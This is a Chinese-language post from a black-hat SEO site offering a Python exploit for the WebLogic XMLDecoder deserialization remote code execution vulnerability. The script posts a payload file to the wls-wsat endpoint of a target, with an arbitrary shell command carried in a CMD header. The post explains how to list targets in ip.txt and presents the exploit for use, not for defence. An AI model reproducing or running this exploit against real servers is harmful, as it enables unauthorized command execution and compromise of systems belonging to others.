黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

Weblogic反序列化远程代码执行漏洞exp

  利用点是weblogic的xmldecoder反序列化漏洞,只是构造巧妙的利用链对Oracle官方历年来对这个漏洞点的补丁绕过

  主要来还是懒 废话不多说直接上exp和poc 吧 poc并不通用 更多用exp吧

  IP填入ip.txt 后用poc检测

  exp:

  import requests import sys def exec_cmd(ip,cmd): url=”http://”+ip+”/wls-wsat/CoordinatorPortType11″ headers={ ‘User-Agent’: ‘Apache-HttpClient/4.1.1 (java 1.5)’, ‘CMD’ : cmd, ‘SOAPAction’:'””‘, ‘Content-Type’:’text/xml’ } with open(‘payload.txt’,’rb’) as f : payloads=f.read() r=requests.post(url,headers=headers,data=payloads) return r.content.decode() def main(): if len(sys.argv)<3: print('usage:exp.py www.0dayhack.com:8080 Weblogic反序列化远程代码执行漏洞exp whoami') sys.exit() ip=sys.argv[1] cmd=sys.argv[2] out=exec_cmd(ip,cmd) print(out) if __name__=='__main__': main()

  注意:

  只支持Py3

  ip.txt是放检测的

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » Weblogic反序列化远程代码执行漏洞exp
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜